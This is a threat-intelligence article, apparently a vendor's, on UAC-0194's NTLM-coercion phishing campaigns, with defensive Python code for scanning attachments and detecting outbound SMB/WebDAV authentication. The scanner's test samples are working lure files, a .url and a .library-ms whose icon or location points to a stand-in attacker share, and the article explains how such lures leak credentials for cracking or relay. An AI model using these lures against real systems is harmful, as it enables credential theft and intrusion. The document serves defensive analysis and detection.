UAC-0194: Inside a Rapidly Evolving NTLM-Exploiting Espionage Operation

UAC-0194 has become an immediate priority for anyone tracking weaknesses in Windows authentication, specifically the Eastern European phishing campaigns that abuse NTLM credential authentication. Over the lifetime of this espionage operation, UAC-0194 has shown that it can turn NTLM into a weapon, converting ordinary-looking files into lures that coerce authentication, and that it can move from credential theft to an extended period of monitoring and collecting intelligence on its targets. This article provides a timely assessment of UAC-0194: the group's operational methods, its motivation, and the expected implications of its campaigns through 2025.

UAC-0194: High-risk threat actor targeting government and strategic sectors

Introduction: A Threat Actor Built Around Subtlety and Precision

UAC-0194 is known for a calculated, precise approach to intelligence gathering rather than disruptive or attention-grabbing activity. Its trademark is coercing NTLMv2 authentication from targeted hosts through crafted documents and shortcut files with minimal user interaction, which gives it a considerable advantage over traditional means of gaining access. Unlike financially motivated threats, UAC-0194 exhibits the traits of long-term intelligence collection. Its targeting, operational rate, and choice of vulnerabilities point to a specific interest in government, diplomatic, and administrative infrastructure in Ukraine, Poland, and Romania. Its quick pivot from one NTLM disclosure vulnerability to the next indicates an unusually fast development cycle for a regional espionage group.

Identity and Motivation: A Regionally Focused Espionage Actor

Identifying the motivation behind regionally focused espionage actors is challenging because little information is available. However, a growing body of intelligence links UAC-0194 to Russian actors, based on its choice of victims and on overlaps between its infrastructure and infrastructure previously attributed to them. CERT-UA's tracking of UAC-0194 also indicates that the group has maintained a continuous presence in operations against Ukrainian organizations.

The group’s goals appear to include:

– Establishing an initial position within government and public institutions.

– Capturing NTLMv2 challenge-response material (Net-NTLMv2) that can be cracked offline or, while the coerced session is live, relayed to other services that accept NTLM. (This material is not the stored NT hash itself, so it cannot be used directly for pass-the-hash; cracking recovers the password, relay reuses the live exchange.)

– Maximizing access to high-value sensitive communications.

– Establishing a foothold for further espionage via lightweight remote access tools.

UAC-0194's operational model does not rely on complex malware families as many of its counterparts do. Instead, it gains its advantage through authentication abuse, which leaves fewer artifacts on the target and gives defenders less opportunity to detect the operation.

TTPs: A Deep Dive Into the Group’s Operational Mechanics

Most of UAC-0194's attack patterns look uncomplicated at first. Beneath them, however, is a carefully constructed workflow built to exploit Windows authentication behaviour, to sidestep the authentication logging defenders usually watch (a coerced NTLM exchange with an attacker's external host is captured there and never reaches the victim's domain controller), and to maintain operational tempo.

Initial Access: Weaponized Shortcuts and Controlled Infrastructure

Phishing emails commonly impersonate legitimate Ukrainian government mail servers; in many instances they genuinely originate from them. Earlier compromises of public sector mailboxes let the attacker send lures that look authentic to government recipients.

What distinguishes UAC-0194's delivery method from typical malware campaigns is the attachment type. Where most campaigns bulk-mail macro-enabled spreadsheets or trojanized installers, UAC-0194 sends .url, .lnk, and .library-ms files. Each of these formats can carry a remote UNC or WebDAV path that Windows resolves on its own (for example to fetch an icon or enumerate a library location), so merely previewing or opening the file can make the victim's host issue an automatic outbound NTLM authentication request to attacker-controlled infrastructure. What leaks is the NTLMv2 challenge-response, which the attacker can crack offline or relay.

Advantages for the attacker:

– Requires very little user interaction
– Makes minimal modifications to the target system
– Provides the attacker with authentication material for cracking or relay
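A mail gateway or triage analyst can catch these lures before they reach Explorer by inspecting the attachment for a remote path. The scanner below is an added example, not code from the article or from any vendor; it parses the two text-based formats (.url is INI-style, .library-ms is XML in the `http://schemas.microsoft.com/windows/2009/library` namespace) and flags any UNC, file://, SMB or WebDAV target whose host is a non-RFC1918 IP or a name outside an assumed internal DNS suffix (`.corp.example`, an assumption). The sample files are constructed; the documentation address 203.0.113.10 stands in for attacker infrastructure. .lnk is a binary format and is not parsed here.

```python
"""Triage of .url and .library-ms attachments for remote authentication triggers (added example)."""
import configparser
import ipaddress
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# Assumption: names under these suffixes are internal; everything else is external.
INTERNAL_SUFFIXES = (".corp.example",)
# RFC 1918 plus loopback and link-local. Checked explicitly rather than via
# ipaddress.is_private, which also treats the 203.0.113.0/24 documentation range as private.
PRIVATE_NETS = [ipaddress.ip_network(n) for n in
                ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]
# Internet Shortcut keys Windows may resolve without the user opening the file.
URL_KEYS = ("URL", "IconFile", "WorkingDirectory")
UNC_RE = re.compile(r"^\\\\([^\\/]+)")     # \\host\share... (host may carry @port or @SSL@port)


def target_host(path: str):
    """Return the remote host a path points at, or None for a purely local path."""
    path = path.strip()
    m = UNC_RE.match(path)
    if m:
        return m.group(1).split("@")[0]       # \\host@SSL@443\DavWWWRoot -> host
    parsed = urlparse(path.replace("\\", "/"))
    if parsed.scheme in ("http", "https", "file", "smb", "dav", "davs"):
        if parsed.hostname:
            return parsed.hostname
        if parsed.scheme == "file" and parsed.path.startswith("//"):   # file:////host/share
            return parsed.path[2:].split("/")[0].split("@")[0]
    return None


def is_external(host: str) -> bool:
    try:
        ip = ipaddress.ip_address(host)
        return not any(ip in net for net in PRIVATE_NETS)
    except ValueError:
        h = host.lower().rstrip(".")
        # Single-label (NetBIOS-style) names are treated as internal.
        return "." in h and not h.endswith(INTERNAL_SUFFIXES)


def scan_url_file(text: str):
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str                      # keep key case (URL, IconFile)
    cp.read_string(text)
    hits = []
    for section in cp.sections():
        for key in URL_KEYS:
            if cp.has_option(section, key):
                host = target_host(cp.get(section, key))
                if host and is_external(host):
                    hits.append((key, host))
    return hits


def scan_library_ms(text: str):
    root = ET.fromstring(text)
    hits = []
    for el in root.iter():
        if el.tag.rsplit("}", 1)[-1] == "url" and el.text:   # <simpleLocation><url>...</url>
            host = target_host(el.text)
            if host and is_external(host):
                hits.append(("url", host))
    return hits


def triage(filename: str, content: str):
    name = filename.lower()
    if name.endswith(".url"):
        return scan_url_file(content)
    if name.endswith(".library-ms"):
        return scan_library_ms(content)
    return []


# Constructed samples. The first looks like an ordinary internal link but fetches its
# icon from a public IP; the second declares a library whose location is that same host.
SAMPLES = {
    "Report_2025.url": (
        "[InternetShortcut]\n"
        "URL=file://fileserver.corp.example/public/report.pdf\n"
        "IconFile=\\\\203.0.113.10\\share\\report.ico\n"
        "IconIndex=1\n"
    ),
    "Shared_Documents.library-ms": (
        '<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">'
        "<searchConnectorDescriptionList><searchConnectorDescription>"
        "<simpleLocation><url>\\\\203.0.113.10\\documents</url></simpleLocation>"
        "</searchConnectorDescription></searchConnectorDescriptionList></libraryDescription>"
    ),
    "Intranet.url": "[InternetShortcut]\nURL=https://intranet.corp.example/\n",
}


def scan_all():
    return {name: triage(name, content) for name, content in SAMPLES.items()}


if __name__ == "__main__":
    for name, hits in scan_all().items():
        print(f"{name}: {'FLAG ' + str(hits) if hits else 'clean'}")
```

In a gateway the cheaper policy is to quarantine these extensions outright; the parser is for the cases where shortcuts must be allowed and for retrospective hunting across already-delivered mail.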


Persistence: Lean, Practical, and Deceptively Simple

Once inside, UAC-0194 does not deploy elaborate persistence frameworks. Instead, the group focuses on:

– Reusing stolen NTLM credential material
– Deploying SparkRAT or similar open-source tools when a stable access point is needed
– Creating lightweight scheduled tasks as needed to regain or rebuild footholds

This lean, practical model leaves minimal forensic residue on the target and so maximizes the chance that the espionage objectives succeed.

C2 and Internal Operations: Blending With Normal Traffic

UAC-0194 prefers hosting payloads in cloud services, redirecting commands through infrastructure that obscures their true origin, and using encrypted channels over standard web protocols, so that its communications blend into the background noise of a modern enterprise network.

Notable Operations: A Timeline of Rapid Evolution

UAC-0194's operations have evolved rapidly since the group was first identified.

Late 2024: The CVE‑2024‑43451 Zero‑Day

The first public reporting on UAC-0194 concerned the exploitation of a then-unpatched NTLM hash disclosure vulnerability, CVE-2024-43451. The group delivered crafted internet shortcut (.url) files whose embedded remote path made Windows connect out and authenticate with NTLMv2 when the file was merely previewed or handled in Explorer. Targeting was primarily Ukrainian government institutions.

Early 2025: Transition to CVE‑2025‑24054

Soon after Microsoft patched that vulnerability, UAC-0194 moved to CVE-2025-24054, a second NTLM hash disclosure vulnerability with similar mechanics, delivered through .library-ms library description files whose remote location triggers the same outbound authentication. These campaigns expanded into Poland and Romania, revealing broader geopolitical ambitions.

Continuing Activity: Credential Replay and Remote Access Deployment

Hash harvesting remains the primary goal. In several observed intrusions, however, after SparkRAT was used to establish a foothold or remote access, the actor used the same tool for further reconnaissance and internal data access.

Recent Developments: A Threat Growing in Precision and Pace

What stands out about UAC-0194 is its operational tempo (the number of breaches it sustains) in addition to its technical capability. Its characteristics include:

– Rapidly exploiting newly disclosed NTLM-related vulnerabilities
– Selecting targets according to regional intelligence requirements
– Crafting phishing lures tailored to government agency workflows
– Increasing use of open-source tools to complicate attribution

Together these indicate that UAC-0194 is an evolving threat able to modify its techniques with little or no downtime.

Conclusion

Implications for 2025 and Defensive Recommendations

UAC-0194's approach shows how badly NTLM-based authentication flows are underestimated, and how many public sector networks still rely on antiquated security models. The combination of low-interaction lures, selective tooling, and regionally focused targeting aligns with long-term espionage rather than short-term opportunism.

Key Defensive Measures

Organizations, government and critical public sector bodies in particular, should:

– Transition away from NTLM wherever possible, as quickly as possible; the Group Policy setting "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" can be set to audit first and then to deny, with exceptions for any remaining legitimate servers
– Require SMB signing on all servers, and block outbound SMB (TCP 445 and 139) and WebDAV traffic at the network perimeter, since a coerced NTLM exchange needs an outbound connection to the attacker's host
– Stop .url and .library-ms files from resolving remote file paths: apply Microsoft's patches for the NTLM disclosure vulnerabilities and block these attachment types (along with .lnk) at the mail gateway
– Implement phishing-resistant multifactor authentication on administrative interfaces
– Monitor for sudden outbound authentication attempts to unusual or external hosts and domain names
– Audit mailboxes for signs of compromise that could have been used to distribute lures
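The monitoring recommendation above can be turned into a concrete detection, because the coerced exchange always needs an outbound client connection. The code below is an added example, not from the article or from any vendor product. It evaluates constructed Sysmon Event ID 3 (network connection) records, flattened here to key=value lines with Sysmon's own field names (UtcTime, Image, User, DestinationIp, DestinationHostname, DestinationPort), against two rules: SMB (445/139) from any process to a non-RFC1918 destination, and WebDAV mini-redirector traffic (svchost.exe, the host of the WebClient service, on 80/443) to a name outside an assumed internal suffix (`.corp.example`). It then groups hits by destination to surface the "sudden" pattern of several users authenticating to the same new external host, as happens when a lure is mailed to a department. The usernames, hosts and threshold are assumptions.

```python
"""Detecting coerced outbound SMB/WebDAV authentication in endpoint telemetry (added example)."""
import ipaddress
from collections import defaultdict

INTERNAL_SUFFIXES = (".corp.example",)           # assumption: internal DNS suffixes
PRIVATE_NETS = [ipaddress.ip_network(n) for n in
                ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]
SMB_PORTS = {445, 139}
WEBDAV_PORTS = {80, 443}


def is_private_ip(s: str) -> bool:
    try:
        ip = ipaddress.ip_address(s)
    except ValueError:
        return False
    return any(ip in net for net in PRIVATE_NETS)


def parse_event(line: str) -> dict:
    """Constructed key=value layout; field names follow Sysmon Event ID 3."""
    ev = dict(kv.split("=", 1) for kv in line.split())
    if ev.get("DestinationHostname", "-") == "-":
        ev["DestinationHostname"] = ""
    return ev


def evaluate(ev: dict):
    """Return a hit dict for a suspicious outbound connection, or None."""
    port = int(ev["DestinationPort"])
    ip, host = ev["DestinationIp"], ev["DestinationHostname"]
    image = ev["Image"].rsplit("\\", 1)[-1].lower()
    if port in SMB_PORTS and not is_private_ip(ip):
        # Any SMB session to the internet is a likely NTLM leak regardless of process.
        return {"rule": "smb-external", "dest": ip, "user": ev["User"], "image": image, "time": ev["UtcTime"]}
    if port in WEBDAV_PORTS and image == "svchost.exe" and host and not host.lower().endswith(INTERNAL_SUFFIXES):
        # The WebClient service (WebDAV mini-redirector) runs inside svchost.exe and will
        # authenticate with NTLM to the remote share named in a .url/.library-ms lure.
        return {"rule": "webdav-external", "dest": ip, "user": ev["User"], "image": image, "time": ev["UtcTime"]}
    return None


def detect(lines):
    hits = []
    for line in lines:
        hit = evaluate(parse_event(line))
        if hit:
            hits.append(hit)
    return hits


def campaign_targets(hits, min_users: int = 2):
    """Destinations contacted by at least min_users distinct users: the signature of a
    mass-mailed lure rather than one person's stray connection."""
    users_by_dest = defaultdict(set)
    for h in hits:
        users_by_dest[h["dest"]].add(h["user"])
    return sorted(d for d, users in users_by_dest.items() if len(users) >= min_users)


# Constructed telemetry: two users render a lure pointing at 203.0.113.10 within minutes;
# the remaining records are ordinary internal file-server and update traffic.
EVENTS = [
    "UtcTime=2025-03-12T08:02:11 Image=C:\\Windows\\explorer.exe User=GOV-EXAMPLE\\o.petrenko "
    "DestinationIp=203.0.113.10 DestinationHostname=- DestinationPort=445",
    "UtcTime=2025-03-12T08:02:13 Image=C:\\Windows\\System32\\svchost.exe User=GOV-EXAMPLE\\o.petrenko "
    "DestinationIp=203.0.113.10 DestinationHostname=files.example.net DestinationPort=80",
    "UtcTime=2025-03-12T08:03:40 Image=C:\\Windows\\explorer.exe User=GOV-EXAMPLE\\i.bondar "
    "DestinationIp=203.0.113.10 DestinationHostname=- DestinationPort=445",
    "UtcTime=2025-03-12T08:05:02 Image=C:\\Windows\\explorer.exe User=GOV-EXAMPLE\\i.bondar "
    "DestinationIp=10.20.0.15 DestinationHostname=fs01.corp.example DestinationPort=445",
    "UtcTime=2025-03-12T08:06:30 Image=C:\\Windows\\System32\\svchost.exe User=GOV-EXAMPLE\\i.bondar "
    "DestinationIp=10.20.0.40 DestinationHostname=update.corp.example DestinationPort=443",
]

if __name__ == "__main__":
    hits = detect(EVENTS)
    for h in hits:
        print(f"{h['time']} {h['rule']:16} {h['user']} -> {h['dest']} via {h['image']}")
    print("probable campaign infrastructure:", campaign_targets(hits))
```

Once the perimeter block on outbound 445/139 recommended above is in place, the SMB rule stops firing on successful connections and the firewall's own deny logs become the higher-fidelity source; the WebDAV rule remains useful because port 80/443 cannot be blocked wholesale.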

UAC-0194 will likely continue refining its techniques throughout 2025, with a growing focus on authentication abuse, stealthy reconnaissance, and penetration of regional government networks. Proactive hardening and closer scrutiny of file-based lures are needed to counter this fast-moving espionage group.

Brandefense provides trusted threat intelligence and digital risk protection for global security teams.